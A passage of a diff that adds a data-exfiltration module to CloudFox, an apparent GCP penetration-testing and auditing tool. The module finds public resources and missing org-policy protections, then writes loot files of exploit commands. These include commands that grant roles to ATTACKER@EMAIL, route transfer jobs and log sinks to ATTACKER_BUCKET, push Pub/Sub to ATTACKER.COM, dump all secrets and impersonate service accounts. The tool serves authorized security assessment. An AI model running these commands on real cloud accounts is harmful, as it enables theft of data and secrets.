internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + []string{targetProject}, + []string{m.GetProjectName(targetProject)}, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output for project %s: %v", targetProject, err), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.CommandCounter.Error++ + } + } +} diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go new file mode 100755 index 00000000..3475c8db --- /dev/null +++ b/gcp/commands/dataexfiltration.go @@ -0,0 +1,1710 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + loggingservice "github.com/BishopFox/cloudfox/gcp/services/loggingService" + orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + vpcscservice "github.com/BishopFox/cloudfox/gcp/services/vpcscService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + compute "google.golang.org/api/compute/v1" + sqladmin "google.golang.org/api/sqladmin/v1" + storage "google.golang.org/api/storage/v1" + storagetransfer "google.golang.org/api/storagetransfer/v1" +) + +// Module name constant +const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" + +var GCPDataExfiltrationCommand = &cobra.Command{ + Use: GCP_DATAEXFILTRATION_MODULE_NAME, + Aliases: []string{"exfil", "data-exfil", "exfiltration"}, + Short: "Identify data exfiltration paths and high-risk data exposure", + Long: `Identify data exfiltration vectors and paths in GCP environments. + +This module identifies both ACTUAL misconfigurations and POTENTIAL exfiltration vectors +using FoxMapper graph data for permission analysis. + +Actual Findings (specific resources): +- Public snapshots and images (actual IAM policy check) +- Public buckets (actual IAM policy check) +- Cross-project logging sinks (actual sink enumeration) +- Pub/Sub push subscriptions to external endpoints +- BigQuery datasets with public IAM bindings +- Storage Transfer Service jobs to external destinations + +Permission-Based Vectors (from FoxMapper graph): +- Storage objects read/list permissions +- BigQuery data access and export permissions +- Cloud SQL export and connect permissions +- Secret Manager access permissions +- KMS decrypt permissions +- Logging read permissions + +Prerequisites: +- Run 'foxmapper gcp graph create' for permission-based analysis + +Security Controls Checked: +- VPC Service Controls (VPC-SC) perimeter protection +- Organization policies for data protection + +The loot file includes commands to perform each type of exfiltration.`, + Run: runGCPDataExfiltrationCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +// ExfiltrationPath represents an actual misconfiguration or finding +type ExfiltrationPath struct { + PathType string // Category of exfiltration + ResourceName string // Specific resource + ProjectID string // Source project + Description string // What the path enables + Destination string // Where data can go + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string // Why this is risky + ExploitCommand string // Command to exploit + VPCSCProtected bool // Is this project protected by VPC-SC? +} + +type PublicExport struct { + ResourceType string + ResourceName string + ProjectID string + AccessLevel string // "allUsers", "allAuthenticatedUsers" + DataType string + Size string + RiskLevel string +} + +// OrgPolicyProtection tracks which org policies protect a project from data exfiltration +type OrgPolicyProtection struct { + ProjectID string + PublicAccessPrevention bool // storage.publicAccessPrevention enforced + DomainRestriction bool // iam.allowedPolicyMemberDomains enforced + SQLPublicIPRestriction bool // sql.restrictPublicIp enforced + ResourceLocationRestriction bool // gcp.resourceLocations enforced + CloudFunctionsVPCConnector bool // cloudfunctions.requireVPCConnector enforced + CloudRunIngressRestriction bool // run.allowedIngress enforced + CloudRunRequireIAMInvoker bool // run.allowedIngress = internal or internal-and-cloud-load-balancing + DisableBQOmniAWS bool // bigquery.disableBQOmniAWS enforced + DisableBQOmniAzure bool // bigquery.disableBQOmniAzure enforced + MissingProtections []string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DataExfiltrationModule struct { + gcpinternal.BaseGCPModule + + ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths + ProjectPublicExports map[string][]PublicExport // projectID -> exports + FoxMapperFindings []foxmapperservice.DataExfilFinding // FoxMapper-based findings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex + vpcscProtectedProj map[string]bool // Projects protected by VPC-SC + orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for unified data access + OrgCache *gcpinternal.OrgCache // OrgCache for ancestry lookups +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DataExfiltrationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataExfiltrationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataExfiltrationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_DATAEXFILTRATION_MODULE_NAME) + if err != nil { + return + } + + module := &DataExfiltrationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectExfiltrationPaths: make(map[string][]ExfiltrationPath), + ProjectPublicExports: make(map[string][]PublicExport), + FoxMapperFindings: []foxmapperservice.DataExfilFinding{}, + LootMap: make(map[string]map[string]*internal.LootFile), + vpcscProtectedProj: make(map[string]bool), + orgPolicyProtection: make(map[string]*OrgPolicyProtection), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DataExfiltrationModule) getAllExfiltrationPaths() []ExfiltrationPath { + var all []ExfiltrationPath + for _, paths := range m.ProjectExfiltrationPaths { + all = append(all, paths...) + } + return all +} + +func (m *DataExfiltrationModule) getAllPublicExports() []PublicExport { + var all []PublicExport + for _, exports := range m.ProjectPublicExports { + all = append(all, exports...) + } + return all +} + +// filterFindingsByProjects filters FoxMapper findings to only include principals +// from the specified projects (via -p or -l flags) OR principals without a clear project +// (users, groups, compute default SAs, etc.) +func (m *DataExfiltrationModule) filterFindingsByProjects(findings []foxmapperservice.DataExfilFinding) []foxmapperservice.DataExfilFinding { + // Build a set of specified project IDs for fast lookup + specifiedProjects := make(map[string]bool) + for _, projectID := range m.ProjectIDs { + specifiedProjects[projectID] = true + } + + var filtered []foxmapperservice.DataExfilFinding + + for _, finding := range findings { + // Filter principals to only those from specified projects OR without a clear project + var filteredPrincipals []foxmapperservice.PrincipalAccess + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + // Include if: + // 1. Principal's project is in our specified list, OR + // 2. Principal has no clear project (users, groups, compute default SAs) + if specifiedProjects[principalProject] || principalProject == "" { + filteredPrincipals = append(filteredPrincipals, p) + } + } + + // Only include the finding if it has matching principals + if len(filteredPrincipals) > 0 { + filteredFinding := finding + filteredFinding.Principals = filteredPrincipals + filtered = append(filtered, filteredFinding) + } + } + + return filtered +} + +// countFindingsByProject returns a count of findings per project for debugging +func (m *DataExfiltrationModule) countFindingsByProject() map[string]int { + counts := make(map[string]int) + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + proj := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if proj == "" { + proj = "(unknown)" + } + counts[proj]++ + } + } + return counts +} + +func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Identifying data exfiltration paths and potential vectors...", GCP_DATAEXFILTRATION_MODULE_NAME) + + // Load OrgCache for ancestry lookups (needed for per-project filtering) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + + // Get FoxMapper cache from context or try to load it + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + // Try to load FoxMapper data (org from hierarchy if available) + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) + } + + // First, check VPC-SC protection status for all projects + m.checkVPCSCProtection(ctx, logger) + + // Check organization policy protections for all projects + m.checkOrgPolicyProtection(ctx, logger) + + // Process each project for actual misconfigurations + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_DATAEXFILTRATION_MODULE_NAME, m.processProject) + + // Analyze permission-based exfiltration using FoxMapper + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Analyzing permission-based exfiltration paths using FoxMapper...", GCP_DATAEXFILTRATION_MODULE_NAME) + svc := m.FoxMapperCache.GetService() + allFindings := svc.AnalyzeDataExfil("") + + // Filter findings to only include principals from specified projects + m.FoxMapperFindings = m.filterFindingsByProjects(allFindings) + + if len(m.FoxMapperFindings) > 0 { + logger.InfoM(fmt.Sprintf("Found %d permission-based exfiltration techniques with access", len(m.FoxMapperFindings)), GCP_DATAEXFILTRATION_MODULE_NAME) + + // Log findings per project for debugging + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + counts := m.countFindingsByProject() + for proj, count := range counts { + logger.InfoM(fmt.Sprintf(" - %s: %d principals", proj, count), GCP_DATAEXFILTRATION_MODULE_NAME) + } + } + } + } else { + logger.InfoM("No FoxMapper data found - skipping permission-based analysis. Run 'foxmapper gcp graph create' for full analysis.", GCP_DATAEXFILTRATION_MODULE_NAME) + } + + allPaths := m.getAllExfiltrationPaths() + + // Check results + hasResults := len(allPaths) > 0 || len(m.FoxMapperFindings) > 0 + + if !hasResults { + logger.InfoM("No data exfiltration paths found", GCP_DATAEXFILTRATION_MODULE_NAME) + return + } + + if len(allPaths) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d actual misconfiguration(s)", len(allPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) + } + if len(m.FoxMapperFindings) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d permission-based exfiltration technique(s) with access", len(m.FoxMapperFindings)), GCP_DATAEXFILTRATION_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// VPC-SC Protection Check +// ------------------------------ +func (m *DataExfiltrationModule) checkVPCSCProtection(ctx context.Context, logger internal.Logger) { + vpcsc := vpcscservice.New() + + if len(m.ProjectIDs) == 0 { + return + } + + policies, err := vpcsc.ListAccessPolicies("") + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM("Could not check VPC-SC policies (may require org-level access)", GCP_DATAEXFILTRATION_MODULE_NAME) + } + return + } + + for _, policy := range policies { + perimeters, err := vpcsc.ListServicePerimeters(policy.Name) + if err != nil { + continue + } + + for _, perimeter := range perimeters { + for _, resource := range perimeter.Resources { + projectNum := strings.TrimPrefix(resource, "projects/") + m.mu.Lock() + m.vpcscProtectedProj[projectNum] = true + m.mu.Unlock() + } + } + } +} + +// ------------------------------ +// Organization Policy Protection Check +// ------------------------------ +func (m *DataExfiltrationModule) checkOrgPolicyProtection(ctx context.Context, logger internal.Logger) { + orgSvc := orgpolicyservice.New() + + for _, projectID := range m.ProjectIDs { + protection := &OrgPolicyProtection{ + ProjectID: projectID, + MissingProtections: []string{}, + } + + policies, err := orgSvc.ListProjectPolicies(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not check org policies for %s: %v", projectID, err), GCP_DATAEXFILTRATION_MODULE_NAME) + } + m.mu.Lock() + m.orgPolicyProtection[projectID] = protection + m.mu.Unlock() + continue + } + + for _, policy := range policies { + switch policy.Constraint { + case "constraints/storage.publicAccessPrevention": + if policy.Enforced { + protection.PublicAccessPrevention = true + } + case "constraints/iam.allowedPolicyMemberDomains": + if policy.Enforced || len(policy.AllowedValues) > 0 { + protection.DomainRestriction = true + } + case "constraints/sql.restrictPublicIp": + if policy.Enforced { + protection.SQLPublicIPRestriction = true + } + case "constraints/gcp.resourceLocations": + if policy.Enforced || len(policy.AllowedValues) > 0 { + protection.ResourceLocationRestriction = true + } + case "constraints/cloudfunctions.requireVPCConnector": + if policy.Enforced { + protection.CloudFunctionsVPCConnector = true + } + case "constraints/run.allowedIngress": + if len(policy.AllowedValues) > 0 { + for _, val := range policy.AllowedValues { + if val == "internal" || val == "internal-and-cloud-load-balancing" { + protection.CloudRunIngressRestriction = true + break + } + } + } + case "constraints/bigquery.disableBQOmniAWS": + if policy.Enforced { + protection.DisableBQOmniAWS = true + } + case "constraints/bigquery.disableBQOmniAzure": + if policy.Enforced { + protection.DisableBQOmniAzure = true + } + } + } + + // Identify missing protections + if !protection.PublicAccessPrevention { + protection.MissingProtections = append(protection.MissingProtections, "storage.publicAccessPrevention not enforced") + } + if !protection.DomainRestriction { + protection.MissingProtections = append(protection.MissingProtections, "iam.allowedPolicyMemberDomains not configured") + } + if !protection.SQLPublicIPRestriction { + protection.MissingProtections = append(protection.MissingProtections, "sql.restrictPublicIp not enforced") + } + if !protection.CloudFunctionsVPCConnector { + protection.MissingProtections = append(protection.MissingProtections, "cloudfunctions.requireVPCConnector not enforced") + } + if !protection.CloudRunIngressRestriction { + protection.MissingProtections = append(protection.MissingProtections, "run.allowedIngress not restricted") + } + if !protection.DisableBQOmniAWS { + protection.MissingProtections = append(protection.MissingProtections, "bigquery.disableBQOmniAWS not enforced") + } + if !protection.DisableBQOmniAzure { + protection.MissingProtections = append(protection.MissingProtections, "bigquery.disableBQOmniAzure not enforced") + } + + m.mu.Lock() + m.orgPolicyProtection[projectID] = protection + m.mu.Unlock() + } +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DataExfiltrationModule) initializeLootForProject(projectID string) { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["data-exfiltration-commands"] = &internal.LootFile{ + Name: "data-exfiltration-commands", + Contents: "# Data Exfiltration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } +} + +// getExploitCommand returns specific exploitation commands for a permission +func getExploitCommand(permission, principal, project string) string { + // Map permissions to specific gcloud/gsutil commands + commands := map[string]string{ + // Storage + "storage.objects.get": "gsutil cp gs://BUCKET/OBJECT ./\ngcloud storage cp gs://BUCKET/OBJECT ./", + "storage.objects.list": "gsutil ls -r gs://BUCKET/\ngcloud storage ls --recursive gs://BUCKET/", + "storage.buckets.setIamPolicy": "gsutil iam ch allUsers:objectViewer gs://BUCKET\n# Or grant yourself access:\ngsutil iam ch user:ATTACKER@EMAIL:objectAdmin gs://BUCKET", + "storage.hmacKeys.create": "gsutil hmac create SERVICE_ACCOUNT_EMAIL", + + // IAM / Service Account Impersonation + "iam.serviceAccounts.signBlob": "gcloud iam service-accounts sign-blob --iam-account=TARGET_SA input.txt output.sig", + "iam.serviceAccountKeys.create": "gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA", + "iam.serviceAccounts.getAccessToken": "gcloud auth print-access-token --impersonate-service-account=TARGET_SA", + + // Storage Transfer + "storagetransfer.jobs.create": "# Create transfer job to exfil bucket to external destination\ngcloud transfer jobs create gs://SOURCE_BUCKET gs://ATTACKER_BUCKET --name=exfil-job", + "storagetransfer.jobs.update": "# Update existing transfer job destination\ngcloud transfer jobs update JOB_NAME --destination=gs://ATTACKER_BUCKET", + "storagetransfer.jobs.run": "gcloud transfer jobs run JOB_NAME", + + // BigQuery + "bigquery.tables.export": "bq extract --destination_format=CSV PROJECT:DATASET.TABLE gs://BUCKET/export.csv", + "bigquery.tables.getData": "bq query --use_legacy_sql=false 'SELECT * FROM `PROJECT.DATASET.TABLE` LIMIT 1000'", + "bigquery.jobs.create": "bq query --use_legacy_sql=false 'SELECT * FROM `PROJECT.DATASET.TABLE`'\nbq extract PROJECT:DATASET.TABLE gs://BUCKET/export.csv", + "bigquery.datasets.setIamPolicy": "bq add-iam-policy-binding --member=user:ATTACKER@EMAIL --role=roles/bigquery.dataViewer PROJECT:DATASET", + + // Cloud SQL + "cloudsql.instances.export": "gcloud sql export sql INSTANCE gs://BUCKET/export.sql --database=DATABASE", + "cloudsql.backupRuns.create": "gcloud sql backups create --instance=INSTANCE", + "cloudsql.instances.connect": "gcloud sql connect INSTANCE --user=USER --database=DATABASE", + "cloudsql.users.create": "gcloud sql users create ATTACKER --instance=INSTANCE --password=PASSWORD", + + // Spanner + "spanner.databases.export": "gcloud spanner databases export DATABASE --instance=INSTANCE --destination-uri=gs://BUCKET/spanner-export/", + "spanner.databases.read": "gcloud spanner databases execute-sql DATABASE --instance=INSTANCE --sql='SELECT * FROM TABLE_NAME'", + "spanner.backups.create": "gcloud spanner backups create BACKUP --instance=INSTANCE --database=DATABASE --retention-period=7d", + + // Datastore / Firestore + "datastore.databases.export": "gcloud datastore export gs://BUCKET/datastore-export/ --namespaces='(default)'", + "datastore.entities.get": "gcloud datastore export gs://BUCKET/datastore-export/", + + // Bigtable + "bigtable.tables.readRows": "cbt -project=PROJECT -instance=INSTANCE read TABLE", + "bigtable.backups.create": "cbt -project=PROJECT -instance=INSTANCE createbackup CLUSTER BACKUP TABLE", + + // Pub/Sub + "pubsub.subscriptions.create": "gcloud pubsub subscriptions create ATTACKER_SUB --topic=TOPIC\ngcloud pubsub subscriptions pull ATTACKER_SUB --auto-ack --limit=100", + "pubsub.subscriptions.consume": "gcloud pubsub subscriptions pull SUBSCRIPTION --auto-ack --limit=100", + "pubsub.subscriptions.update": "gcloud pubsub subscriptions update SUBSCRIPTION --push-endpoint=https://ATTACKER.COM/webhook", + + // Compute + "compute.snapshots.create": "gcloud compute snapshots create SNAPSHOT_NAME --source-disk=DISK_NAME --source-disk-zone=ZONE", + "compute.disks.createSnapshot": "gcloud compute disks snapshot DISK_NAME --zone=ZONE --snapshot-names=SNAPSHOT_NAME", + "compute.images.create": "gcloud compute images create IMAGE_NAME --source-disk=DISK_NAME --source-disk-zone=ZONE", + "compute.machineImages.create": "gcloud compute machine-images create IMAGE_NAME --source-instance=INSTANCE --source-instance-zone=ZONE", + "compute.images.setIamPolicy": "gcloud compute images add-iam-policy-binding IMAGE --member=user:ATTACKER@EMAIL --role=roles/compute.imageUser", + "compute.snapshots.setIamPolicy": "gcloud compute snapshots add-iam-policy-binding SNAPSHOT --member=user:ATTACKER@EMAIL --role=roles/compute.storageAdmin", + + // Logging + "logging.sinks.create": "gcloud logging sinks create SINK_NAME storage.googleapis.com/ATTACKER_BUCKET --log-filter='resource.type=\"gce_instance\"'", + "logging.sinks.update": "gcloud logging sinks update SINK_NAME --destination=storage.googleapis.com/ATTACKER_BUCKET", + "logging.logEntries.list": "gcloud logging read 'resource.type=\"gce_instance\"' --limit=1000 --format=json > logs.json", + + // Secret Manager + "secretmanager.versions.access": "gcloud secrets versions access latest --secret=SECRET_NAME", + "secretmanager.secrets.list": "gcloud secrets list --format='value(name)'\n# Then access each secret:\nfor secret in $(gcloud secrets list --format='value(name)'); do gcloud secrets versions access latest --secret=$secret; done", + + // KMS + "cloudkms.cryptoKeyVersions.useToDecrypt": "gcloud kms decrypt --key=KEY_NAME --keyring=KEYRING --location=LOCATION --ciphertext-file=encrypted.bin --plaintext-file=decrypted.txt", + "cloudkms.cryptoKeys.setIamPolicy": "gcloud kms keys add-iam-policy-binding KEY_NAME --keyring=KEYRING --location=LOCATION --member=user:ATTACKER@EMAIL --role=roles/cloudkms.cryptoKeyDecrypter", + + // Artifact Registry + "artifactregistry.repositories.downloadArtifacts": "gcloud artifacts docker images list LOCATION-docker.pkg.dev/PROJECT/REPO\ndocker pull LOCATION-docker.pkg.dev/PROJECT/REPO/IMAGE:TAG", + "artifactregistry.repositories.setIamPolicy": "gcloud artifacts repositories add-iam-policy-binding REPO --location=LOCATION --member=user:ATTACKER@EMAIL --role=roles/artifactregistry.reader", + + // Cloud Functions + "cloudfunctions.functions.get": "gcloud functions describe FUNCTION_NAME --region=REGION", + "cloudfunctions.functions.sourceCodeGet": "gcloud functions describe FUNCTION_NAME --region=REGION --format='value(sourceArchiveUrl)'\ngsutil cp SOURCE_URL ./function-source.zip", + + // Cloud Run + "run.services.get": "gcloud run services describe SERVICE --region=REGION --format=yaml", + + // Dataproc + "dataproc.jobs.create": "gcloud dataproc jobs submit spark --cluster=CLUSTER --region=REGION --class=org.example.ExfilJob --jars=gs://ATTACKER_BUCKET/exfil.jar", + + // Dataflow + "dataflow.jobs.create": "gcloud dataflow jobs run exfil-job --gcs-location=gs://dataflow-templates/latest/GCS_to_GCS --region=REGION --parameters inputDirectory=gs://SOURCE_BUCKET,outputDirectory=gs://ATTACKER_BUCKET", + + // Redis + "redis.instances.export": "gcloud redis instances export gs://BUCKET/redis-export.rdb --instance=INSTANCE --region=REGION", + + // AlloyDB + "alloydb.backups.create": "gcloud alloydb backups create BACKUP --cluster=CLUSTER --region=REGION", + + // Source Repos + "source.repos.get": "gcloud source repos clone REPO_NAME\ncd REPO_NAME && git log --all", + + // Healthcare API + "healthcare.fhirResources.get": "curl -H \"Authorization: Bearer $(gcloud auth print-access-token)\" \"https://healthcare.googleapis.com/v1/projects/PROJECT/locations/LOCATION/datasets/DATASET/fhirStores/STORE/fhir/Patient\"", + "healthcare.dicomStores.dicomWebRetrieve": "curl -H \"Authorization: Bearer $(gcloud auth print-access-token)\" \"https://healthcare.googleapis.com/v1/projects/PROJECT/locations/LOCATION/datasets/DATASET/dicomStores/STORE/dicomWeb/studies\"", + "healthcare.datasets.export": "gcloud healthcare datasets export DATASET --location=LOCATION --destination-uri=gs://BUCKET/healthcare-export/", + } + + cmd, ok := commands[permission] + if !ok { + return fmt.Sprintf("# No specific command for %s - check gcloud documentation", permission) + } + + // Replace placeholders with actual values where possible + if project != "" && project != "-" { + cmd = strings.ReplaceAll(cmd, "PROJECT", project) + } + + return cmd +} + +// generatePlaybookForProject generates a loot file specific to a project +// It includes SAs from that project + users/groups (which apply to all projects) +func (m *DataExfiltrationModule) generatePlaybookForProject(projectID string) *internal.LootFile { + var sb strings.Builder + sb.WriteString("# GCP Data Exfiltration Commands\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString("# Generated by CloudFox\n") + sb.WriteString("# WARNING: Only use with proper authorization\n\n") + + // Actual misconfigurations for this project + paths := m.ProjectExfiltrationPaths[projectID] + if len(paths) > 0 { + sb.WriteString("# === ACTUAL MISCONFIGURATIONS ===\n\n") + for _, path := range paths { + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s: %s\n"+ + "# =============================================================================\n", path.PathType, path.ResourceName)) + sb.WriteString(fmt.Sprintf("# Description: %s\n", path.Description)) + if path.ExploitCommand != "" { + sb.WriteString(path.ExploitCommand) + sb.WriteString("\n\n") + } + } + } + + // Permission-based findings from FoxMapper - filter to this project's principals + users/groups + if len(m.FoxMapperFindings) > 0 { + hasFindings := false + + for _, finding := range m.FoxMapperFindings { + var relevantPrincipals []foxmapperservice.PrincipalAccess + + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + // Include if: SA from this project OR user/group (no project) + if principalProject == projectID || principalProject == "" { + relevantPrincipals = append(relevantPrincipals, p) + } + } + + if len(relevantPrincipals) == 0 { + continue + } + + if !hasFindings { + sb.WriteString("# === PERMISSION-BASED EXFILTRATION COMMANDS ===\n\n") + hasFindings = true + } + + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s (%s)\n"+ + "# =============================================================================\n", finding.Permission, finding.Service)) + sb.WriteString(fmt.Sprintf("# %s\n\n", finding.Description)) + + for _, p := range relevantPrincipals { + project := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if project == "" { + project = projectID // Use the target project for users/groups + } + + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = "serviceAccount" + } else { + principalType = "user" + } + } + + sb.WriteString(fmt.Sprintf("## %s (%s)\n", p.Principal, principalType)) + + // Add impersonation command if it's a service account + if p.IsServiceAccount { + sb.WriteString(fmt.Sprintf("# Impersonate first:\ngcloud config set auth/impersonate_service_account %s\n\n", p.Principal)) + } + + // Add the exploitation command + cmd := getExploitCommand(finding.Permission, p.Principal, project) + sb.WriteString(cmd) + sb.WriteString("\n\n") + + // Reset impersonation note + if p.IsServiceAccount { + sb.WriteString("# Reset impersonation when done:\n# gcloud config unset auth/impersonate_service_account\n\n") + } + } + } + } + + contents := sb.String() + // Don't return empty loot file + if contents == fmt.Sprintf("# GCP Data Exfiltration Commands\n# Project: %s\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", projectID) { + return nil + } + + return &internal.LootFile{ + Name: "data-exfiltration-commands", + Contents: contents, + } +} + +func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing exfiltration paths in project: %s", projectID), GCP_DATAEXFILTRATION_MODULE_NAME) + } + + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + + // === ACTUAL MISCONFIGURATIONS === + + // 1. Find public/shared snapshots + m.findPublicSnapshots(ctx, projectID, logger) + + // 2. Find public/shared images + m.findPublicImages(ctx, projectID, logger) + + // 3. Find public buckets + m.findPublicBuckets(ctx, projectID, logger) + + // 4. Find cross-project logging sinks + m.findCrossProjectLoggingSinks(ctx, projectID, logger) + + // 5. Find Pub/Sub push subscriptions to external endpoints + m.findPubSubPushEndpoints(ctx, projectID, logger) + + // 6. Find Pub/Sub subscriptions exporting to external destinations + m.findPubSubExportSubscriptions(ctx, projectID, logger) + + // 7. Find BigQuery datasets with public access + m.findPublicBigQueryDatasets(ctx, projectID, logger) + + // 8. Find Cloud SQL with export enabled + m.findCloudSQLExportConfig(ctx, projectID, logger) + + // 9. Find Storage Transfer jobs to external destinations + m.findStorageTransferJobs(ctx, projectID, logger) +} + +// findPublicSnapshots finds snapshots that are publicly accessible +func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not create Compute service in project %s", projectID)) + return + } + + req := computeService.Snapshots.List(projectID) + err = req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do() + if err != nil { + continue + } + + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + if member == "allUsers" { + accessLevel = "allUsers" + break + } + if accessLevel != "allUsers" { + accessLevel = "allAuthenticatedUsers" + } + } + } + } + + if accessLevel != "" { + export := PublicExport{ + ResourceType: "Disk Snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "disk_snapshot", + Size: fmt.Sprintf("%d GB", snapshot.DiskSizeGb), + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "Public Snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Disk snapshot (%d GB) accessible to %s", snapshot.DiskSizeGb, accessLevel), + Destination: "Anyone with access level: " + accessLevel, + RiskLevel: "CRITICAL", + RiskReasons: []string{"Snapshot is publicly accessible", "May contain sensitive data from disk"}, + ExploitCommand: fmt.Sprintf( + "# Create disk from public snapshot\n"+ + "gcloud compute disks create exfil-disk --source-snapshot=projects/%s/global/snapshots/%s --zone=us-central1-a", + projectID, snapshot.Name), + } + + m.mu.Lock() + m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not list snapshots in project %s", projectID)) + } +} + +// findPublicImages finds images that are publicly accessible +func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Images.List(projectID) + err = req.Pages(ctx, func(page *compute.ImageList) error { + for _, image := range page.Items { + policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do() + if err != nil { + continue + } + + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + if member == "allUsers" { + accessLevel = "allUsers" + break + } + if accessLevel != "allUsers" { + accessLevel = "allAuthenticatedUsers" + } + } + } + } + + if accessLevel != "" { + export := PublicExport{ + ResourceType: "VM Image", + ResourceName: image.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "vm_image", + Size: fmt.Sprintf("%d GB", image.DiskSizeGb), + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "Public Image", + ResourceName: image.Name, + ProjectID: projectID, + Description: fmt.Sprintf("VM image (%d GB) accessible to %s", image.DiskSizeGb, accessLevel), + Destination: "Anyone with access level: " + accessLevel, + RiskLevel: "CRITICAL", + RiskReasons: []string{"VM image is publicly accessible", "May contain embedded credentials or sensitive data"}, + ExploitCommand: 